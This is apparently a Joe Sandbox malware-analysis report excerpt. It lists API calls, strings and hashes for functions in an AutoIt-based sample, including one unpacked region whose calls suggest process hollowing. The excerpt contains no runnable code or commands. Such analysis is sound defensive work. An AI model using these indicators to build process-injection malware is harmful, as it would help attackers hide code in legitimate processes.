                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                            • Instruction ID: 49c78bc4eec7e1a72a358853faa8de252a036114c085a0840924e96ff3abe3c7
                                                            • Opcode Fuzzy Hash: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                            • Instruction Fuzzy Hash: 7FF03A706002A0BEEA3157236C48E7B2E7DD7C6F60F4001BAB900E61F0C2B10842CEB4

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 01671070: Sleep.KERNELBASE(000001F4), ref: 01671081
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016712A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: AD70DBZW6DC8KT
                                                            • API String ID: 2694422964-3728862823
                                                            • Opcode ID: b3027d0bd29f41f16655be8028069cb4f5cad1b6242a8db9238b19936d6d3116
                                                            • Instruction ID: 42500348a1f4328ed9cd110198da334b20a6eff744fa7bc9e9a7b7893c894731
                                                            • Opcode Fuzzy Hash: b3027d0bd29f41f16655be8028069cb4f5cad1b6242a8db9238b19936d6d3116
                                                            • Instruction Fuzzy Hash: F4518070E04249EBEF11DBA4DC55BEEBB79AF19300F00419AE609BB2C0D7B94B45CB65

                                                            Control-flow Graph

                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039D3D7
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • _memset.LIBCMT ref: 003640FC
                                                            • _wcscpy.LIBCMT ref: 00364150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
                                                            • Instruction ID: bce2b2df68524a99e2d837ed313c8577dff3934343ac58e7f738685b585ddc33
                                                            • Opcode Fuzzy Hash: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
                                                            • Instruction Fuzzy Hash: A831D031508304AFD732EB60DC46FEB77DCAF44304F50862AF5858A0E5DB709648CBA6
                                                            APIs
                                                              • Part of subcall function 00364DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                            • _free.LIBCMT ref: 0039E263
                                                            • _free.LIBCMT ref: 0039E2AA
                                                              • Part of subcall function 00366A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 18eb53ceedc67db82bebc6792e405f19f9b038944f9aa9b2a54d4ff2c142c7f6
                                                            • Instruction ID: 246b9f00fd833590f6fd5535fa127cdf5788c2ef8c58c58bc2282e0fb0909f3b
                                                            • Opcode Fuzzy Hash: 18eb53ceedc67db82bebc6792e405f19f9b038944f9aa9b2a54d4ff2c142c7f6
                                                            • Instruction Fuzzy Hash: 6F917D71910219AFCF06EFA4CC919EEB7B8FF18314F10856AF815AB2A1DB71AD05CB50
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003635A1,SwapMouseButtons,00000004,?), ref: 003635D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 003635F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 00363617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                            • Instruction ID: 6bd489419d3c3ed8422cb44f76042b42cbc3a17954c47e9c461e535b5484b183
                                                            • Opcode Fuzzy Hash: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                            • Instruction Fuzzy Hash: 79115771614218BFDB22CF68DC80EAEBBBCEF04740F018569F805DB214E2719F409BA4
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0167082B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016708C1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016708E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                            • Instruction ID: e061133ad6bc2d2dd7d80a4211d99eb5b386511a7513109ff7a0c2ecca98c795
                                                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                            • Instruction Fuzzy Hash: B362FB30A142589BEB24CFA4CC50BDEB776EF59700F1091A9E10DEB390E7769E81CB59
                                                            APIs
                                                              • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                            • _free.LIBCMT ref: 003C96A2
                                                            • _free.LIBCMT ref: 003C96A9
                                                            • _free.LIBCMT ref: 003C9714
                                                              • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                              • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                            • _free.LIBCMT ref: 003C971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: 1ffa577895b785983435910fbad7f3b613eef6d86ef4971d665a4796a529bb4d
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 26512BB1D04258AFDF269F64CC85B9EBBB9EF48300F10449EF609AB251DB715E908F58
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 5f536ce81fc6121791bbb0591d85efc12f60ed5ab336dc9770998ea1102441e4
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 7B41E634A007479BDF1AEF69C8809AE77A6EF81364B2581BDF825CBE40E771DD408B40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/?$EA06
                                                            • API String ID: 4104443479-2942601680
                                                            • Opcode ID: cf2cc0aa7356249226f8160dd776b653009428929e0129ca215746ed79f2fb74
                                                            • Instruction ID: 1fd43877a57a9342a21cc5129cc06489106c518e8b3753e7392dd79d5da887e6
                                                            • Opcode Fuzzy Hash: cf2cc0aa7356249226f8160dd776b653009428929e0129ca215746ed79f2fb74
                                                            • Instruction Fuzzy Hash: 5C414C21E041586BDF239B64C8617BF7FA6DB46300F68C475ED829F28FD6319D4483A1
                                                            APIs
                                                            • _memset.LIBCMT ref: 0039EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0039EA83
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 00380791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                            • Instruction ID: f05197229de63c03821d0e035311a8b448a0dbf0b19e096cea8beeb08ebf2e9d
                                                            • Opcode Fuzzy Hash: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                            • Instruction Fuzzy Hash: 9D219071A002589BCF52DF94D845BEE7BFCAF49714F00805AE408AB281DBF859898FA1
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 003C98F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003C990F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                            • Instruction ID: 3b4dcdedd6529c0b9b9aafea56993148c35565e92ca5376c7f22f703c5fc3ec7
                                                            • Opcode Fuzzy Hash: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                            • Instruction Fuzzy Hash: 16D05E7954030DAFDB60ABA4DC8EFEA773CE704700F0007B1BB54990E1EBB095988B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                            • Instruction ID: 9373082971ecb5d8e4107c82cec66502bd88a02844b64342e3198bf61d4578a5
                                                            • Opcode Fuzzy Hash: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                            • Instruction Fuzzy Hash: C3F138B16183019FCB15DF28D480A6ABBE9FF89314F15892EF8999B351D730E945CF82
                                                            APIs
                                                            • _memset.LIBCMT ref: 00364370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00364432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                            • Instruction ID: d1ff23cb32d91d49ac15ebc27394f24345fe770eff92e1489eb44f25e50bd257
                                                            • Opcode Fuzzy Hash: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                            • Instruction Fuzzy Hash: FF3191B4A04701CFC732DF25D885A9BBBF8FB48309F00493EE59A86291E770A944CB56
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A192
                                                              • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A19C
                                                            • __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038A1C8: GetModuleFileNameW.KERNEL32(00000000,004233BA,00000104,?,00000001,00000000), ref: 0038A25A
                                                              • Part of subcall function 0038A1C8: ___crtMessageBoxW.LIBCMT ref: 0038A308
                                                              • Part of subcall function 0038309F: ___crtCorExitProcess.LIBCMT ref: 003830A5
                                                              • Part of subcall function 0038309F: ExitProcess.KERNEL32 ref: 003830AE
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                            • Instruction ID: 62a69dcd647fced57177c00f0697de00f798e7739de1bbeb6853785cc8d9e51e
                                                            • Opcode Fuzzy Hash: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                            • Instruction Fuzzy Hash: C101B175340B01DAE6233B38EC82A2E739C9B82762F6145FAF5059E2C1DFB49C414765
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003C9548,?,?,?,?,?,00000004), ref: 003C98BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003C98D1
                                                            • CloseHandle.KERNEL32(00000000,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C98D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                            • Instruction ID: 6135cbd23bc18e7fe1cd8876873d322a6cf0d9cd3287494e59688c9c177b3d3c
                                                            • Opcode Fuzzy Hash: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                            • Instruction Fuzzy Hash: 29E04F32140218BBDB321B54EC49F9A7B19AB06761F118220FB14A90E087B119119798
                                                            APIs
                                                            • _free.LIBCMT ref: 003C8D1B
                                                              • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                              • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                            • _free.LIBCMT ref: 003C8D2C
                                                            • _free.LIBCMT ref: 003C8D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: f5f8503ce71bb0d127822cfdf3c775b001977c6d61ee6abb72f20e7657a38a92
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: DFE012B1601B014ACB26B678AA44F9357EC4F98352715095DB41EDB186CE64FD468324
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 0e56bf02bfc66ae9d88fdd003929d7a72b9d21b4889d607e24d94cccb5728b4c
                                                            • Instruction ID: c1594d96c9514b29438dbbf19723f670dd3294be334bf64b5be33c037053a66c
                                                            • Opcode Fuzzy Hash: 0e56bf02bfc66ae9d88fdd003929d7a72b9d21b4889d607e24d94cccb5728b4c
                                                            • Instruction Fuzzy Hash: 44225670508700DFCB26DF24C490A6ABBE5BF85304F15C96DE88A9B666D735EC85CF82
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: 104a360ddf9b9cecb89ceb5e3ef0003d9ff947073bd2b875999681f6295c7868
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 1431D4B1604A06AFC705DF68C8D1E69F3A9FF48324755C629E429CB791EB30E924CB90
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00364834
                                                              • Part of subcall function 0038336C: __lock.LIBCMT ref: 00383372
                                                              • Part of subcall function 0038336C: DecodePointer.KERNEL32(00000001,?,00364849,003B7C74), ref: 0038337E
                                                              • Part of subcall function 0038336C: EncodePointer.KERNEL32(?,?,00364849,003B7C74), ref: 00383389
                                                              • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00364915
                                                              • Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0036492A
                                                              • Part of subcall function 00363B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                              • Part of subcall function 00363B3A: IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                              • Part of subcall function 00363B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                              • Part of subcall function 00363B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00364874
                                                            Memory Dump Source
